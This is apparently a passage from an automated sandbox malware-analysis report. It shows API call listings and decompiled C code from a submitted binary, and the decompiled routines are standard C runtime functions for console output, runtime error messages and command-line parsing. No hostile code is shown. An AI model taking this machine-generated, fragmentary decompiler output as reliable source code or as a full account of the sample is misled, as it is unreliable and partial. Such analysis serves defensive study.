    • GetProcAddress.KERNEL32(00000000,FlsFree,?,03002D9E), ref: 03004EDA
    • TlsAlloc.KERNEL32(?,03002D9E), ref: 03004F2A
    • TlsSetValue.KERNEL32(00000000,?,03002D9E), ref: 03004F45
    • EncodePointer.KERNEL32(?,03002D9E), ref: 03004F60
    • EncodePointer.KERNEL32(?,03002D9E), ref: 03004F6D
    • EncodePointer.KERNEL32(?,03002D9E), ref: 03004F7A
    • EncodePointer.KERNEL32(?,03002D9E), ref: 03004F87
      • Part of subcall function 03006D14: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 03006D3C
    • DecodePointer.KERNEL32(03004D5A,?,03002D9E), ref: 03004FA8
      • Part of subcall function 03006933: Sleep.KERNEL32(00000000,03002BF3), ref: 0300695B
    • DecodePointer.KERNEL32(00000000,?,03002D9E), ref: 03004FD7
      • Part of subcall function 03004C13: GetModuleHandleW.KERNEL32(KERNEL32.DLL,03009848,00000008,03004D1B,00000000,00000000,?,03003EAA,03002BF3), ref: 03004C24
      • Part of subcall function 03004C13: InterlockedIncrement.KERNEL32(0300B450), ref: 03004C65
    • GetCurrentThreadId.KERNEL32(?,03002D9E), ref: 03004FE9
      • Part of subcall function 03004BD6: DecodePointer.KERNEL32(FFFFFFFF,03004FFF,?,03002D9E), ref: 03004BE7
      • Part of subcall function 03004BD6: TlsFree.KERNEL32(FFFFFFFF,03004FFF,?,03002D9E), ref: 03004C01
      • Part of subcall function 03004BD6: DeleteCriticalSection.KERNEL32(00000000,00000000,00009E40,?,03004FFF,?,03002D9E), ref: 03006D7B
      • Part of subcall function 03004BD6: DeleteCriticalSection.KERNEL32(FFFFFFFF,00009E40,?,03004FFF,?,03002D9E), ref: 03006DA5
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 90%
    			E03005429(void* __ebx, signed int __edx, long _a4, long _a8, signed int _a12) {
    				signed int _v8;
    				char _v15;
    				void _v16;
    				short _v1724;
    				char _v5140;
    				void _v6844;
    				short _v6848;
    				long _v6852;
    				signed char _v6853;
    				long _v6860;
    				long _v6864;
    				int _v6868;
    				long _v6872;
    				long _v6876;
    				long _v6880;
    				long _v6884;
    				signed int _v6888;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				signed int _t209;
    				long _t211;
    				intOrPtr _t214;
    				long _t215;
    				intOrPtr _t216;
    				long _t217;
    				void* _t223;
    				signed int _t225;
    				signed int* _t230;
    				long _t242;
    				long _t245;
    				signed int* _t246;
    				long _t252;
    				long _t253;
    				signed int* _t256;
    				long _t262;
    				long _t263;
    				void* _t267;
    				long _t271;
    				int _t272;
    				long _t274;
    				void* _t275;
    				short _t277;
    				void* _t278;
    				void* _t282;
    				long _t284;
    				void* _t286;
    				int _t293;
    				int _t300;
    				void* _t304;
    				intOrPtr* _t313;
    				long _t314;
    				signed int _t315;
    				signed short* _t316;
    				signed int _t317;
    				long _t318;
    				signed short* _t319;
    				signed char _t322;
    				long _t331;
    				long _t335;
    				long _t337;
    				char _t341;
    				signed int _t352;
    				long _t355;
    				void* _t356;
    				void* _t357;
    				long _t359;
    				signed int _t361;
    				void* _t362;
    
    				_t350 = __edx;
    				_t312 = __ebx;
    				E03007F10(0x1ae4);
    				_t209 =  *0x300bbe4; // 0xbb40e64e
    				_v8 = _t209 ^ _t361;
    				_t211 = _a8;
    				_t355 = _a4;
    				_t352 = 0;
    				_v6864 = _t211;
    				_v6860 = 0;
    				_v6868 = 0;
    				if(_a12 != 0) {
    					__eflags = _t211;
    					if(_t211 != 0) {
    						_push(__ebx);
    						_t313 = 0x3012f80 + (_t355 >> 5) * 4;
    						_t214 =  *_t313;
    						_t352 = (_t355 & 0x0000001f) << 6;
    						_t322 =  *((intOrPtr*)(_t214 + _t352 + 0x24)) +  *((intOrPtr*)(_t214 + _t352 + 0x24)) >> 1;
    						_v6880 = _t313;
    						_v6853 = _t322;
    						__eflags = _t322 - 2;
    						if(_t322 == 2) {
    							L6:
    							_t322 =  !_a12;
    							__eflags = _t322 & 0x00000001;
    							if((_t322 & 0x00000001) != 0) {
    								L8:
    								__eflags =  *(_t214 + _t352 + 4) & 0x00000020;
    								if(( *(_t214 + _t352 + 4) & 0x00000020) != 0) {
    									E030052BA(_t322, _t355, 0, 0, 2);
    									_t362 = _t362 + 0x10;
    								}
    								_t215 = E03005C43(_t355);
    								__eflags = _t215;
    								if(_t215 == 0) {
    									L45:
    									_t325 = 0;
    									__eflags = 0;
    									goto L46;
    								} else {
    									__eflags =  *(_t352 +  *_t313 + 4) & 0x00000080;
    									if(__eflags == 0) {
    										goto L45;
    									}
    									_t267 = E03004D40(_t313, _t350, __eflags);
    									__eflags =  *( *((intOrPtr*)(_t267 + 0x6c)) + 0x14);
    									_t355 = 0 |  *( *((intOrPtr*)(_t267 + 0x6c)) + 0x14) == 0x00000000;
    									_t271 = GetConsoleMode( *(_t352 +  *_t313),  &_v6884);
    									_t325 = 0;
    									__eflags = _t271;
    									if(_t271 == 0) {
    										L46:
    										_t216 =  *_t313;
    										__eflags =  *(_t216 + _t352 + 4) & 0x00000080;
    										if(( *(_t216 + _t352 + 4) & 0x00000080) == 0) {
    											_t217 = WriteFile( *(_t216 + _t352), _v6864, _a12,  &_v6876, _t325);
    											__eflags = _t217;
    											if(_t217 == 0) {
    												L85:
    												_v6848 = GetLastError();
    												L86:
    												__eflags = _v6860;
    												if(_v6860 != 0) {
    													_t220 = _v6860 - _v6868;
    													__eflags = _v6860 - _v6868;
    													L97:
    													_pop(_t312);
    													L98:
    													return E03006BA0(_t220, _t312, _v8 ^ _t361, _t350, _t352, _t355);
    												}
    												L87:
    												__eflags = _v6848;
    												if(_v6848 == 0) {
    													L91:
    													_t223 =  *_v6880;
    													__eflags =  *(_t352 + _t223 + 4) & 0x00000040;
    													if(( *(_t352 + _t223 + 4) & 0x00000040) == 0) {
    														L94:
    														 *((intOrPtr*)(E03003EA5())) = 0x1c;
    														_t225 = E03003EB8();
    														 *_t225 =  *_t225 & 0x00000000;
    														__eflags =  *_t225;
    														L95:
    														_t220 = _t225 | 0xffffffff;
    														goto L97;
    													}
    													__eflags =  *_v6864 - 0x1a;
    													if( *_v6864 != 0x1a) {
    														goto L94;
    													}
    													_t220 = 0;
    													goto L97;
    												}
    												_t355 = 5;
    												__eflags = _v6848 - _t355;
    												if(_v6848 != _t355) {
    													_t225 = E03003ECB(_v6848);
    												} else {
    													 *((intOrPtr*)(E03003EA5())) = 9;
    													_t225 = E03003EB8();
    													 *_t225 = _t355;
    												}
    												goto L95;
    											}
    											_v6848 = _v6848 & 0x00000000;
    											_v6860 = _v6876;
    											goto L86;
    										}
    										__eflags = _v6853;
    										_v6848 = _t325;
    										if(_v6853 != 0) {
    											__eflags = _v6853 - 2;
    											if(_v6853 != 2) {
    												_v6872 = _v6864;
    												__eflags = _a12 - _t325;
    												if(_a12 <= _t325) {
    													goto L91;
    												} else {
    													goto L70;
    												}
    												do {
    													L70:
    													_v6852 = _v6852 & 0x00000000;
    													_t331 = _v6872 - _v6864;
    													__eflags = _t331;
    													_t230 =  &_v1724;
    													_t356 = 2;
    													do {
    														__eflags = _t331 - _a12;
    														if(_t331 >= _a12) {
    															break;
    														}
    														_t350 =  *_v6872 & 0x0000ffff;
    														_v6872 = _v6872 + _t356;
    														_t331 = _t331 + _t356;
    														__eflags = _t350 - 0xa;
    														if(_t350 == 0xa) {
    															_t315 = 0xd;
    															 *_t230 = _t315;
    															_t230 = _t230 + _t356;
    															_t167 =  &_v6852;
    															 *_t167 = _v6852 + _t356;
    															__eflags =  *_t167;
    														}
    														_v6852 = _v6852 + _t356;
    														 *_t230 = _t350;
    														_t230 = _t230 + _t356;
    														__eflags = _v6852 - 0x6a8;
    													} while (_v6852 < 0x6a8);
    													_t355 = 0;
    													asm("cdq");
    													_t314 = WideCharToMultiByte(0xfde9, 0,  &_v1724, _t230 -  &_v1724 - _t350 >> 1,  &_v5140, 0xd55, 0, 0);
    													__eflags = _t314;
    													if(_t314 == 0) {
    														goto L85;
    													} else {
    														goto L76;
    													}
    													while(1) {
    														L76:
    														_t242 = WriteFile( *(_t352 +  *_v6880), _t361 + _t355 - 0x1410, _t314 - _t355,  &_v6876, 0);
    														__eflags = _t242;
    														if(_t242 == 0) {
    															break;
    														}
    														_t355 = _t355 + _v6876;
    														__eflags = _t314 - _t355;
    														if(_t314 > _t355) {
    															continue;
    														}
    														L80:
    														__eflags = _t314 - _t355;
    														if(_t314 > _t355) {
    															goto L86;
    														}
    														goto L81;
    													}
    													_v6848 = GetLastError();
    													goto L80;
    													L81:
    													_t245 = _v6872 - _v6864;
    													_v6860 = _t245;
    													__eflags = _t245 - _a12;
    												} while (_t245 < _a12);
    												goto L86;
    											}
    											_t316 = _v6864;
    											__eflags = _a12 - _t325;
    											if(_a12 <= _t325) {
    												goto L91;
    											} else {
    												goto L60;
    											}
    											do {
    												L60:
    												_v6852 = _v6852 & 0x00000000;
    												_t335 = _t316 - _v6864;
    												__eflags = _t335;
    												_t246 =  &_v6844;
    												_t357 = 2;
    												do {
    													__eflags = _t335 - _a12;
    													if(_t335 >= _a12) {
    														break;
    													}
    													_t350 =  *_t316 & 0x0000ffff;
    													_t316 = _t316 + _t357;
    													_t335 = _t335 + _t357;
    													_v6884 = _t316;
    													__eflags = _t350 - 0xa;
    													if(_t350 == 0xa) {
    														_v6868 = _v6868 + _t357;
    														_t317 = 0xd;
    														 *_t246 = _t317;
    														_t316 = _v6884;
    														_t246 = _t246 + _t357;
    														_t140 =  &_v6852;
    														 *_t140 = _v6852 + _t357;
    														__eflags =  *_t140;
    													}
    													_v6852 = _v6852 + _t357;
    													 *_t246 = _t350;
    													_t246 = _t246 + _t357;
    													__eflags = _v6852 - 0x13fe;
    												} while (_v6852 < 0x13fe);
    												_t355 = _t246 -  &_v6844;
    												_t252 = WriteFile( *(_t352 +  *_v6880),  &_v6844, _t355,  &_v6876, 0);
    												__eflags = _t252;
    												if(_t252 == 0) {
    													goto L85;
    												}
    												_t253 = _v6876;
    												_v6860 = _v6860 + _t253;
    												__eflags = _t253 - _t355;
    												if(_t253 < _t355) {
    													goto L86;
    												}
    												__eflags = _t316 - _v6864 - _a12;
    											} while (_t316 - _v6864 < _a12);
    											goto L86;
    										}
    										_t318 = _v6864;
    										__eflags = _a12 - _t325;
    										if(_a12 <= _t325) {
    											goto L91;
    										} else {
    											goto L49;
    										}
    										do {
    											L49:
    											_t359 = 0;
    											_t337 = _t318 - _v6864;
    											__eflags = _t337;
    											_t256 =  &_v6844;
    											do {
    												__eflags = _t337 - _a12;
    												if(_t337 >= _a12) {
    													break;
    												}
    												_t350 =  *_t318;
    												_t318 = _t318 + 1;
    												_t337 = _t337 + 1;
    												_v6884 = _t318;
    												__eflags = _t350 - 0xa;
    												if(_t350 == 0xa) {
    													_v6868 =  &(_v6868->Internal);
    													 *_t256 = 0xd;
    													_t256 =  &(_t256[0]);
    													_t359 = _t359 + 1;
    													__eflags = _t359;
    												}
    												 *_t256 = _t350;
    												_t256 =  &(_t256[0]);
    												_t359 = _t359 + 1;
    												__eflags = _t359 - 0x13ff;
    											} while (_t359 < 0x13ff);
    											_t355 = _t256 -  &_v6844;
    											_t262 = WriteFile( *(_t352 +  *_v6880),  &_v6844, _t355,  &_v6876, 0);
    											__eflags = _t262;
    											if(_t262 == 0) {
    												goto L85;
    											}
    											_t263 = _v6876;
    											_v6860 = _v6860 + _t263;
    											__eflags = _t263 - _t355;
    											if(_t263 < _t355) {
    												goto L86;
    											}
    											__eflags = _t318 - _v6864 - _a12;
    										} while (_t318 - _v6864 < _a12);
    										goto L86;
    									}
    									__eflags = _t355;
    									if(_t355 == 0) {
    										L15:
    										_t272 = GetConsoleCP();
    										_t319 = _v6864;
    										_v6884 = _t272;
    										_v6872 = 0;
    										__eflags = _a12;
    										if(_a12 <= 0) {
    											goto L87;
    										}
    										_v6852 = 0;
    										do {
    											_t274 = _v6853;
    											__eflags = _t274;
    											if(_t274 != 0) {
    												__eflags = _t274 - 1;
    												if(_t274 == 1) {
    													L35:
    													_t355 =  *_t319 & 0x0000ffff;
    													__eflags = _t355 - 0xa;
    													_t325 = 0 | _t355 == 0x0000000a;
    													_t319 =  &(_t319[1]);
    													_t81 =  &_v6852;
    													 *_t81 = _v6852 + 2;
    													__eflags =  *_t81;
    													_v6848 = _t355;
    													_v6888 = _t355 == 0xa;
    													L36:
    													__eflags = _t274 - 1;
    													if(_t274 == 1) {
    														L38:
    														_t275 = E03007D97(_t325, _v6848);
    														_pop(_t325);
    														__eflags = _t275 - _v6848;
    														if(_t275 != _v6848) {
    															goto L85;
    														}
    														_v6860 = _v6860 + 2;
    														__eflags = _v6888;
    														if(_v6888 == 0) {
    															goto L42;
    														}
    														_t277 = 0xd;
    														_v6848 = _t277;
    														_t278 = E03007D97(_t325, _t277);
    														_pop(_t325);
    														__eflags = _t278 - _v6848;
    														if(_t278 != _v6848) {
    															goto L85;
    														}
    														_v6860 = _v6860 + 1;
    														_t94 =  &_v6868;
    														 *_t94 =  &(_v6868->Internal);
    														__eflags =  *_t94;
    														goto L42;
    													}
    													__eflags = _t274 - 2;
    													if(_t274 != 2) {
    														goto L42;
    													}
    													goto L38;
    												}
    												__eflags = _t274 - 2;
    												if(_t274 != 2) {
    													goto L36;
    												}
    												goto L35;
    											}
    											_t341 =  *_t319;
    											_t355 = _v6880;
    											__eflags = _t341 - 0xa;
    											_v6888 = 0 | _t341 == 0x0000000a;
    											_t282 =  *_t355 + _t352;
    											__eflags =  *(_t282 + 0x38);
    											if( *(_t282 + 0x38) == 0) {
    												_t284 = E03006B8D(_t341);
    												__eflags = _t284;
    												if(_t284 == 0) {
    													_push(1);
    													_push(_t319);
    													L25:
    													_push( &_v6848);
    													_t286 = E03007EEF();
    													_t362 = _t362 + 0xc;
    													__eflags = _t286 - 0xffffffff;
    													if(_t286 == 0xffffffff) {
    														goto L86;
    													}
    													L26:
    													_t319 =  &(_t319[0]);
    													_v6852 = _v6852 + 1;
    													_t355 = WideCharToMultiByte(_v6884, 0,  &_v6848, 1,  &_v16, 5, 0, 0);
    													__eflags = _t355;
    													if(_t355 == 0) {
    														goto L86;
    													}
    													_t293 = WriteFile( *(_t352 +  *_v6880),  &_v16, _t355,  &_v6872, 0);
    													__eflags = _t293;
    													if(_t293 == 0) {
    														goto L85;
    													}
    													_t325 = _v6868;
    													_v6860 = _v6852 + _v6868;
    													__eflags = _v6872 - _t355;
    													if(_v6872 < _t355) {
    														goto L86;
    													}
    													__eflags = _v6888;
    													if(_v6888 == 0) {
    														goto L42;
    													}
    													_v16 = 0xd;
    													_t300 = WriteFile( *(_t352 +  *_v6880),  &_v16, 1,  &_v6872, 0);
    													__eflags = _t300;
    													if(_t300 == 0) {
    														goto L85;
    													}
    													__eflags = _v6872 - 1;
    													if(_v6872 < 1) {
    														goto L86;
    													}
    													_v6868 =  &(_v6868->Internal);
    													_v6860 = _v6860 + 1;
    													goto L42;
    												}
    												__eflags = _v6864 - _t319 + _a12 - 1;
    												if(_v6864 - _t319 + _a12 <= 1) {
    													_t350 =  *_t319;
    													_v6860 = _v6860 + 1;
    													 *((char*)(_t352 +  *_t355 + 0x34)) =  *_t319;
    													 *((intOrPtr*)(_t352 +  *_t355 + 0x38)) = 1;
    													goto L86;
    												}
    												_t304 = E03007EEF( &_v6848, _t319, 2);
    												_t362 = _t362 + 0xc;
    												__eflags = _t304 - 0xffffffff;
    												if(_t304 == 0xffffffff) {
    													goto L86;
    												}
    												_t319 =  &(_t319[0]);
    												_v6852 = _v6852 + 1;
    												goto L26;
    											}
    											_t350 =  *((intOrPtr*)(_t282 + 0x34));
    											_v16 =  *((intOrPtr*)(_t282 + 0x34));
    											_v15 = _t341;
    											 *(_t282 + 0x38) =  *(_t282 + 0x38) & 0x00000000;
    											_push(2);
    											_push( &_v16);
    											goto L25;
    											L42:
    											__eflags = _v6852 - _a12;
    										} while (_v6852 < _a12);
    										goto L86;
    									}
    									__eflags = _v6853;
    									if(_v6853 == 0) {
    										goto L46;
    									}
    									goto L15;
    								}
    							}
    							 *(E03003EB8()) =  *_t307 & 0x00000000;
    							 *((intOrPtr*)(E03003EA5())) = 0x16;
    							_t225 = E03003E53();
    							goto L95;
    						}
    						__eflags = _t322 - 1;
    						if(_t322 != 1) {
    							goto L8;
    						}
    						goto L6;
    					}
    					 *(E03003EB8()) = 0;
    					 *((intOrPtr*)(E03003EA5())) = 0x16;
    					_t220 = E03003E53() | 0xffffffff;
    					goto L98;
    				}
    				_t220 = 0;
    				goto L98;
    			}

    APIs
    • __getptd.LIBCMT ref: 0300551B
      • Part of subcall function 03004D40: __amsg_exit.LIBCMT ref: 03004D50
    • GetConsoleMode.KERNEL32(?,?), ref: 03005539
    • GetConsoleCP.KERNEL32 ref: 03005559
      • Part of subcall function 03006B8D: __isleadbyte_l.LIBCMT ref: 03006B97
    • __Stoull.NTSTC_LIBCMT ref: 030055F3
    • __Stoull.NTSTC_LIBCMT ref: 03005617
    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 03005649
    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 03005672
    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 030056CB
      • Part of subcall function 03007D97: ___initconout.LIBCMT ref: 03007DA6
      • Part of subcall function 03007D97: WriteConsoleW.KERNEL32(FFFFFFFE,?,00000001,00000000,00000000), ref: 03007DC9
    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 03005839
    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 03005913
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 030059E3
    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 03005A14
    • GetLastError.KERNEL32 ref: 03005A2A
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 03005A6B
    • GetLastError.KERNEL32(?,03005BBB,?,?,?,030098B8,00000010,03002FCE,?,?,00000001,?,?,?,?), ref: 03005A8A
      • Part of subcall function 03006BA0: IsDebuggerPresent.KERNEL32 ref: 03008C43
      • Part of subcall function 03006BA0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03008C58
      • Part of subcall function 03006BA0: UnhandledExceptionFilter.KERNEL32(03002930), ref: 03008C63
      • Part of subcall function 03006BA0: GetCurrentProcess.KERNEL32(C0000409), ref: 03008C7F
      • Part of subcall function 03006BA0: TerminateProcess.KERNEL32(00000000), ref: 03008C86
      • Part of subcall function 030052BA: SetFilePointer.KERNEL32(00000000,?,00000000,030034EA,?,?,?,?,?,030054FC,?,00000000,00000000,00000002,?,00000001), ref: 030052FC
      • Part of subcall function 030052BA: GetLastError.KERNEL32(?,030054FC,?,00000000,00000000,00000002,?,00000001,?,?,03005BBB,?,?,?,030098B8,00000010), ref: 03005309
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 78%
    			E0300424F(void* __edx, void* _a4) {
    				signed int _v8;
    				struct HINSTANCE__* _v9;
    				void _v508;
    				long _v512;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t18;
    				signed int _t23;
    				short _t28;
    				void* _t32;
    				void* _t34;
    				void* _t37;
    				long _t38;
    				void* _t39;
    				struct HINSTANCE__* _t40;
    				void* _t52;
    				long _t53;
    				void* _t54;
    				signed int _t55;
    				void* _t56;
    				void* _t57;
    
    				_t52 = __edx;
    				_t18 =  *0x300bbe4; // 0xbb40e64e
    				_v8 = _t18 ^ _t55;
    				_t54 = _a4;
    				_t53 = E03004229(_t54);
    				_t40 = 0;
    				_v512 = _t53;
    				if(_t53 != 0) {
    					if(E030076D8(3) == 1 || E030076D8(3) == 0 &&  *0x300b000 == 1) {
    						_t54 = GetStdHandle(0xfffffff4);
    						if(_t54 != _t40 && _t54 != 0xffffffff) {
    							_t23 = 0;
    							while(1) {
    								 *((char*)(_t55 + _t23 - 0x1f8)) =  *((intOrPtr*)(_t53 + _t23 * 2));
    								if( *((intOrPtr*)(_t53 + _t23 * 2)) == _t40) {
    									break;
    								}
    								_t23 = _t23 + 1;
    								if(_t23 < 0x1f4) {
    									continue;
    								}
    								break;
    							}
    							_v9 = _t40;
    							_t20 = WriteFile(_t54,  &_v508, E03002C60( &_v508),  &_v512, _t40);
    						}
    					} else {
    						if(_t54 != 0xfc) {
    							_t53 = 0x300be08;
    							_t28 = E03007675(0x300be08, 0x314, L"Runtime Error!\n\nProgram: ");
    							_t57 = _t56 + 0xc;
    							if(_t28 != 0) {
    								_push(_t40);
    								_push(_t40);
    								_push(_t40);
    								_push(_t40);
    								_push(_t40);
    								goto L9;
    							} else {
    								_t54 = 0x300be3a;
    								 *0x300c042 = _t28;
    								_t38 = GetModuleFileNameW(_t40, 0x300be3a, 0x104);
    								_t40 = 0x2fb;
    								if(_t38 == 0) {
    									_t39 = E03007675(0x300be3a, 0x2fb, L"<program name unknown>");
    									_t57 = _t57 + 0xc;
    									if(_t39 != 0) {
    										L8:
    										_push(0);
    										_push(0);
    										_push(0);
    										_push(0);
    										_push(0);
    										L9:
    										E03003E01();
    									}
    								}
    							}
    							if(E0300765A(_t54) + 1 > 0x3c) {
    								_t40 = _t40 - (0x300bdc4 + E0300765A(_t54) * 2 - _t54 >> 1);
    								_t37 = E0300758D(0x300bdc4 + E0300765A(_t54) * 2, _t40, L"...", 3);
    								_t57 = _t57 + 0x14;
    								if(_t37 != 0) {
    									goto L8;
    								}
    							}
    							_t54 = 0x314;
    							_t32 = E03007518(_t53, 0x314, L"\n\n");
    							_t57 = _t57 + 0xc;
    							if(_t32 != 0) {
    								goto L8;
    							}
    							_t34 = E03007518(_t53, 0x314, _v512);
    							_t57 = _t57 + 0xc;
    							if(_t34 != 0) {
    								goto L8;
    							}
    							_t20 = E030073AC(_t52, _t53, L"Microsoft Visual C++ Runtime Library", 0x12010);
    						}
    					}
    				}
    				return E03006BA0(_t20, _t40, _v8 ^ _t55, _t52, _t53, _t54);
    			}


























    APIs
    • GetModuleFileNameW.KERNEL32(00000000,0300BE3A,00000104,00000001,00000000,?), ref: 030042EB
      • Part of subcall function 03003E01: GetCurrentProcess.KERNEL32(C0000417,03002BF3), ref: 03003E17
      • Part of subcall function 03003E01: TerminateProcess.KERNEL32(00000000), ref: 03003E1E
    • _wcslen.LIBCMT ref: 0300431A
    • _wcslen.LIBCMT ref: 03004327
      • Part of subcall function 030073AC: LoadLibraryW.KERNEL32(USER32.DLL), ref: 030073E7
      • Part of subcall function 030073AC: GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 03007403
      • Part of subcall function 030073AC: EncodePointer.KERNEL32(00000000), ref: 03007414
      • Part of subcall function 030073AC: GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 03007421
      • Part of subcall function 030073AC: EncodePointer.KERNEL32(00000000), ref: 03007424
      • Part of subcall function 030073AC: GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 03007431
      • Part of subcall function 030073AC: EncodePointer.KERNEL32(00000000), ref: 03007434
      • Part of subcall function 030073AC: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 03007441
      • Part of subcall function 030073AC: EncodePointer.KERNEL32(00000000), ref: 03007444
      • Part of subcall function 030073AC: GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 03007455
      • Part of subcall function 030073AC: EncodePointer.KERNEL32(00000000), ref: 03007458
      • Part of subcall function 030073AC: DecodePointer.KERNEL32(00000000,0300BE08,00000314,00000000), ref: 0300747A
      • Part of subcall function 030073AC: DecodePointer.KERNEL32 ref: 03007484
      • Part of subcall function 030073AC: DecodePointer.KERNEL32(?,0300BE08,00000314,00000000), ref: 030074C3
      • Part of subcall function 030073AC: DecodePointer.KERNEL32(?), ref: 030074DD
      • Part of subcall function 030073AC: DecodePointer.KERNEL32(0300BE08,00000314,00000000), ref: 030074F1
    • GetStdHandle.KERNEL32(000000F4,00000001,00000000,?), ref: 0300439D
    • _strlen.LIBCMT ref: 030043DA
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 030043E9
      • Part of subcall function 03006BA0: IsDebuggerPresent.KERNEL32 ref: 03008C43
      • Part of subcall function 03006BA0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03008C58
      • Part of subcall function 03006BA0: UnhandledExceptionFilter.KERNEL32(03002930), ref: 03008C63
      • Part of subcall function 03006BA0: GetCurrentProcess.KERNEL32(C0000409), ref: 03008C7F
      • Part of subcall function 03006BA0: TerminateProcess.KERNEL32(00000000), ref: 03008C86
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00402858(CHAR* __eax, intOrPtr* __edx) {
    				char _t5;
    				char _t6;
    				CHAR* _t7;
    				char _t9;
    				CHAR* _t11;
    				char _t14;
    				CHAR* _t15;
    				char _t17;
    				CHAR* _t19;
    				CHAR* _t22;
    				CHAR* _t23;
    				CHAR* _t32;
    				intOrPtr _t33;
    				intOrPtr* _t34;
    				void* _t35;
    				void* _t36;
    
    				_t34 = __edx;
    				_t22 = __eax;
    				while(1) {
    					L2:
    					_t5 =  *_t22;
    					if(_t5 != 0 && _t5 <= 0x20) {
    						_t22 = CharNextA(_t22);
    					}
    					L2:
    					_t5 =  *_t22;
    					if(_t5 != 0 && _t5 <= 0x20) {
    						_t22 = CharNextA(_t22);
    					}
    					L4:
    					if( *_t22 != 0x22 || _t22[1] != 0x22) {
    						_t36 = 0;
    						_t32 = _t22;
    						while(1) {
    							_t6 =  *_t22;
    							if(_t6 <= 0x20) {
    								break;
    							}
    							if(_t6 != 0x22) {
    								_t7 = CharNextA(_t22);
    								_t36 = _t36 + _t7 - _t22;
    								_t22 = _t7;
    								continue;
    							}
    							_t22 = CharNextA(_t22);
    							while(1) {
    								_t9 =  *_t22;
    								if(_t9 == 0 || _t9 == 0x22) {
    									break;
    								}
    								_t11 = CharNextA(_t22);
    								_t36 = _t36 + _t11 - _t22;
    								_t22 = _t11;
    							}
    							if( *_t22 != 0) {
    								_t22 = CharNextA(_t22);
    							}
    						}
    						E00404478(_t34, _t36);
    						_t23 = _t32;
    						_t33 =  *_t34;
    						_t35 = 0;
    						while(1) {
    							_t14 =  *_t23;
    							if(_t14 <= 0x20) {
    								break;
    							}
    							if(_t14 != 0x22) {
    								_t15 = CharNextA(_t23);
    								if(_t15 <= _t23) {
    									continue;
    								} else {
    									goto L27;
    								}
    								do {
    									L27:
    									 *((char*)(_t33 + _t35)) =  *_t23;
    									_t23 =  &(_t23[1]);
    									_t35 = _t35 + 1;
    								} while (_t15 > _t23);
    								continue;
    							}
    							_t23 = CharNextA(_t23);
    							while(1) {
    								_t17 =  *_t23;
    								if(_t17 == 0 || _t17 == 0x22) {
    									break;
    								}
    								_t19 = CharNextA(_t23);
    								if(_t19 <= _t23) {
    									continue;
    								} else {
    									goto L21;
    								}
    								do {
    									L21:
    									 *((char*)(_t33 + _t35)) =  *_t23;
    									_t23 =  &(_t23[1]);
    									_t35 = _t35 + 1;
    								} while (_t19 > _t23);
    							}
    							if( *_t23 != 0) {
    								_t23 = CharNextA(_t23);
    							}
    						}
    						return _t23;
    					} else {
    						_t22 =  &(_t22[2]);
    						continue;
    					}
    				}
    			}




















    APIs
    • CharNextA.USER32(00000000), ref: 00402863
    • CharNextA.USER32(00000000), ref: 0040288F
    • CharNextA.USER32(00000000), ref: 00402899
    • CharNextA.USER32(00000000), ref: 004028B6
    • CharNextA.USER32(00000000), ref: 004028C0
    • CharNextA.USER32(00000000), ref: 004028E9
    • CharNextA.USER32(00000000), ref: 004028F3
    • CharNextA.USER32(00000000), ref: 00402917
    • CharNextA.USER32(00000000), ref: 00402921
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 56%
    			E03002D14() {
    				intOrPtr _t22;
    				void* _t26;
    				void* _t29;
    				void* _t30;
    				void* _t31;
    				void* _t32;
    				void* _t43;
    				signed int _t45;
    				void* _t55;
    				void* _t56;
    				void* _t57;
    				void* _t59;
    				intOrPtr _t60;
    				void* _t61;
    
    				_push(0x58);
    				_push(0x3009808);
    				E03005030(_t43, _t56, _t57);
    				GetStartupInfoW(_t59 - 0x68);
